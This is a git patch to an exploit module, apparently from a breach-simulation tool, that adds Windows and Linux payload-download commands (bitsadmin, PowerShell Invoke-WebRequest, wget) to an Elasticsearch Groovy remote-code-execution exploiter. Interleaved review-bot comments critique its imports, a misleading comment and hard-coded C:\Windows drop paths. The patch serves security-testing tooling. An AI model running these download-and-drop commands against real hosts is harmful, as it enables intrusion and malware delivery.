From a54eedec113d914a458fc675e61052770dd8e5bf Mon Sep 17 00:00:00 2001 From: Vakaris Date: Tue, 24 Jul 2018 15:55:34 +0300 Subject: [PATCH] Commands tested and working on windows. --- infection_monkey/exploit/elasticgroovy.py | 25 +++++++++++++++++------ 1 file changed, 19 insertions(+), 6 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 668a95ce3..51531957b 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -6,13 +6,14 @@ import json import logging - import requests - -from model import DROPPER_ARG from network.elasticfinger import ES_SERVICE, ES_PORT from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from exploit.web_rce import WebRCE +from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED + +import copy +import re __author__ = 'danielg' @@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE): DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder + # Both commands are prepared for use in future development + RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' + POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" + _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): 
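Review bot: In the import hunk (`@@ -6,13 +6,14 @@`), `import re` and `POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED` are added, but none of the 19 inserted lines in this patch uses either name, so both look like dead imports. I would drop `import re` and reduce the model import to `from model import WGET_HTTP_UPLOAD` until the PowerShell template is actually used. The new stdlib imports also land below the project imports; moving `import copy` up next to `import json` and `import logging` would restore the stdlib / third-party / local grouping.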
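Review bot: The comment `# Both commands are prepared for use in future development` in the `@@ -34,6 +35,10 @@` hunk is inaccurate as committed, because `RDP_CMDLINE_HTTP` is used for the `'windows'` entry of `commands` in the `@@ -56,14 +61,22 @@` hunk of this same patch. Only `POWERSHELL_COMMAND` is unused, and it overlaps in purpose with the `POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED` template this commit imports from `model`, so one of the two should be removed. The nearby `# copied from rdpgrinder` comment suggests the bitsadmin string is a second copy of an existing constant; importing one shared definition would stop the copies drifting apart. If the constants stay, I would reword the comment to `# Windows download command used by this exploiter; POWERSHELL_COMMAND is not used yet`.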
@@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE): if not vulnerable_urls: return False - if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config): + # Extra escaping required: + config = copy.deepcopy(self._config) + config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe" + config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe" + + if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): return False - data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0]) + commands = {'windows': self.RDP_CMDLINE_HTTP, + 'linux': WGET_HTTP_UPLOAD} + + data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands) # We can't use 'if not' because response may be '' if data is not False and data['response'] == False: @@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE): payload = self.JAVA_CMD % command response = requests.get(url, data=payload) result = self.get_results(response) - if not result: # not vulnerable + if not result: return False return result[0]
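Review bot: The deep-copied `config` in the `@@ -56,14 +61,22 @@` hunk overwrites `dropper_target_path_win_32` and `dropper_target_path_win_64` with hard-coded `C:\\\\Windows\\\\monkey32.exe` / `monkey64.exe` literals, so the drop path set in the configuration is silently ignored by both `check_remote_files` and `upload_monkey` for this exploiter. Anyone running the simulation who relies on the configured path for cleanup or for correlating alerts will look in the wrong place. Deriving the escaped value from the existing setting keeps the two in step, e.g. `config.dropper_target_path_win_32 = self._config.dropper_target_path_win_32.replace('\\', '\\' * 4)` and the same for `_64`, assuming the configured value uses single backslashes. The comment `# Extra escaping required:` should also name which layers consume the backslashes (presumably the JSON request body and the string in `JAVA_CMD`) so the factor of four can be checked. The enclosing method starts and ends outside this hunk.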